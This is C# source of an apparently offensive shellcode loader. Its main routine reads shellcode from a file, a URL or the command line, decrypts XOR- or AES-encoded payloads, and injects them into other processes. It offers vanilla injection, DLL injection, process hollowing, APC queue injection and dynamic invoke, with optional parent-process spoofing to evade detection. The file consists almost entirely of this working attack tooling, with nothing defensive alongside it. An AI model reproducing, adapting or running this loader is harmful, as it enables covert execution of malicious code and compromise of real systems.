public static string ProcHollowRun(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
ProcessHollowing prochollow = new ProcessHollowing();
prochollow.Hollow(targetProcess, buffer);
return(null);
}
public static string PPidProcHollowRun(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
PPID.ParentPidSpoofing Parent = new PPID.ParentPidSpoofing();
PROCESS_INFORMATION pinf = Parent.ParentSpoofing(SearchPID.SearchForPPID(), targetProcess);
ProcessHollowing hollow = new ProcessHollowing();
hollow.CreateSection((uint)buffer.Length);
hollow.FindEntry(pinf.hProcess);
hollow.SetLocalSection((uint)buffer.Length);
hollow.CopyShellcode(buffer);
hollow.MapAndStart(pinf);
Interop.CloseHandle(pinf.hThread);
Interop.CloseHandle(pinf.hProcess);
return(null);
}
public static void Main(string[] args)
{
try
{
logo();
// https://github.com/GhostPack/Rubeus/blob/master/Rubeus/Domain/ArgumentParser.cs#L10
var arguments = new Dictionary <string, string>();
foreach (var argument in args)
{
var idx = argument.IndexOf(':');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
else
{
arguments[argument] = string.Empty;
}
}
WindowsIdentity identity = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(identity);
if (principal.IsInRole(WindowsBuiltInRole.Administrator))
{
PrintInfo($"[!] Process running with {principal.Identity.Name} privileges with HIGH integrity.");
}
else
{
PrintInfo($"[!] Process running with {principal.Identity.Name} privileges with MEDIUM / LOW integrity.");
}
if (arguments.Count == 0)
{
PrintError("[-] No arguments specified. Please refer the help section for more details.");
help();
}
else if (arguments.ContainsKey("/help"))
{
help();
}
else if (arguments.Count < 3)
{
PrintError("[-] Some arguments are missing. Please refer the help section for more details.");
help();
}
else if (arguments.Count >= 3)
{
int procid = 0;
PPIDSpoofing Parent = new PPIDSpoofing();
string ppid = null;
int parentProc = 0;
string shellcode = null;
byte[] rawshellcode = new byte[] { };
byte[] dllbuf = new byte[] { };
if (arguments.ContainsKey("/pid"))
{
procid = Convert.ToInt32(arguments["/pid"]);
Process process = Process.GetProcessById(procid);
}
if (arguments.ContainsKey("/parentproc"))
{
ppid = Convert.ToString(arguments["/parentproc"]);
parentProc = Parent.SearchForPPID(ppid);
}
if (arguments.ContainsKey("/path") && System.IO.File.Exists(arguments["/path"]))
{
if (arguments["/t"] != "2")
{
if (arguments["/f"] == "raw")
{
rawshellcode = System.IO.File.ReadAllBytes(arguments["/path"]);
}
else
{
shellcode = System.IO.File.ReadAllText(arguments["/path"]);
}
}
else if (arguments["/t"] == "2")
{
dllbuf = Encoding.Default.GetBytes(arguments["/path"]);
}
}
else if (arguments.ContainsKey("/url"))
{
if (arguments["/t"] != "2")
{
if (arguments["/f"] == "raw")
{
rawshellcode = GetRawShellcode(arguments["/url"]);
}
else
{
shellcode = GetShellcode(arguments["/url"]);
}
}
}
else if (arguments.ContainsKey("/sc"))
{
if (arguments["/f"] == "base64" || arguments["/f"] == "hex")
{
shellcode = arguments["/sc"];
}
}
if (arguments["/t"] != "2" && (shellcode != null || rawshellcode.Length > 0))
{
byte[] xorshellcode = new byte[] { };
byte[] aesshellcode = new byte[] { };
byte[] buf = new byte[] { };
if (arguments.ContainsKey("/enc") == true && arguments["/enc"] == "xor")
{
if (arguments["/f"] == "base64")
{
xorshellcode = Convert.FromBase64String(shellcode);
buf = xor(xorshellcode, Encoding.ASCII.GetBytes(arguments["/key"]));
}
else if (arguments["/f"] == "hex")
{
xorshellcode = StringToByteArray(shellcode);
buf = xor(xorshellcode, Encoding.ASCII.GetBytes(arguments["/key"]));
}
else if (arguments["/f"] == "c")
{
xorshellcode = convertfromc(shellcode);
buf = xor(xorshellcode, Encoding.ASCII.GetBytes(arguments["/key"]));
}
else if (arguments["/f"] == "raw")
{
buf = xor(rawshellcode, Encoding.ASCII.GetBytes(arguments["/key"]));
}
}
else if (arguments.ContainsKey("/enc") == true && arguments["/enc"] == "aes")
{
byte[] passwordBytes = Encoding.UTF8.GetBytes(arguments["/key"]);
passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
if (arguments["/f"] == "base64")
{
aesshellcode = Convert.FromBase64String(shellcode);
buf = AES_Decrypt(aesshellcode, passwordBytes);
}
else if (arguments["/f"] == "hex")
{
aesshellcode = StringToByteArray(shellcode);
buf = AES_Decrypt(aesshellcode, passwordBytes);
}
else if (arguments["/f"] == "c")
{
aesshellcode = convertfromc(shellcode);
buf = AES_Decrypt(aesshellcode, passwordBytes);
}
else if (arguments["/f"] == "raw")
{
buf = AES_Decrypt(rawshellcode, passwordBytes);
}
}
else
{
if (arguments["/f"] == "base64")
{
buf = Convert.FromBase64String(shellcode);
}
else if (arguments["/f"] == "hex")
{
buf = StringToByteArray(shellcode);
}
else if (arguments["/f"] == "c")
{
buf = convertfromc(shellcode);
}
else if (arguments["/f"] == "raw")
{
buf = rawshellcode;
}
}
if (arguments["/t"] == "1")
{
if (arguments.ContainsKey("/parentproc"))
{
if (arguments.ContainsKey("/ppath"))
{
PrintTitle($"[>>] Parent Process Spoofing with Vanilla Process Injection Technique.");
PPIDCodeInject(arguments["/ppath"], buf, parentProc);
}
else
{
PrintError("[-] /ppath argument is missing");
}
}
else
{
PrintTitle($"[>>] Vanilla Process Injection Technique.");
CodeInject(procid, buf);
}
}
else if (arguments["/t"] == "3")
{
if (arguments.ContainsKey("/ppath"))
{
if (arguments.ContainsKey("/parentproc"))
{
PrintTitle($"[>>] Parent Process Spoofing with Process Hollowing Technique.");
ProcessHollowing prochollow = new ProcessHollowing();
prochollow.PPIDPProcHollow(arguments["/ppath"], buf, parentProc);
}
else
{
PrintTitle($"[>>] Process Hollowing Injection Technique.");
ProcessHollowing prochollow = new ProcessHollowing();
prochollow.ProcHollow(arguments["/ppath"], buf);
}
}
else
{
PrintError("[-] /ppath argument is missing");
}
}
else if (arguments["/t"] == "4")
{
if (arguments.ContainsKey("/ppath"))
{
if (arguments.ContainsKey("/parentproc"))
{
PrintTitle($"[>>] Parent Process Spoofing with APC Queue Injection Technique.");
PPIDAPCInject(arguments["/ppath"], buf, parentProc);
}
else
{
PrintTitle($"[>>] APC Queue Injection Technique.");
PROCESS_INFORMATION processInfo = StartProcess(arguments["/ppath"]);
APCInject(processInfo.dwProcessId, processInfo.dwThreadId, buf);
}
}
else
{
PrintError("[-] /ppath argument is missing");
}
}
else if (arguments["/t"] == "5")
{
if (arguments.ContainsKey("/parentproc"))
{
if (arguments.ContainsKey("/ppath"))
{
PrintTitle($"[>>] Dynamic Invoke - Parent Process Spoofing with Vanilla Process Injection Technique.");
PPIDDynCodeInject(arguments["/ppath"], buf, parentProc);
}
else
{
PrintError("[-] /ppath argument is missing");
}
}
else
{
PrintTitle($"[>>] Dynamic Invoke - Vanilla Process Injection Technique.");
DynamicCodeInject(procid, buf);
}
}
}
else if (arguments["/t"] == "2")
{
if (arguments.ContainsKey("/parentproc"))
{
if (arguments.ContainsKey("/ppath"))
{
PrintTitle($"[>>] Parent Process Spoofing with DLL Injection Technique.");
PPIDDLLInject(arguments["/ppath"], dllbuf, parentProc);
}
else
{
PrintError("[-] /ppath argument is missing");
}
}
else
{
PrintTitle($"[>>] DLL Injection Technique.");
DLLInject(procid, dllbuf);
}
}
else
{
PrintError("[-] Please check the specified file path or the URL.");
}
}
else
{
PrintError("[-] Invalid argument. Please refer the help section for more details.");
help();
}
}
catch (Exception ex)
{
PrintError(ex.Message);
}
}
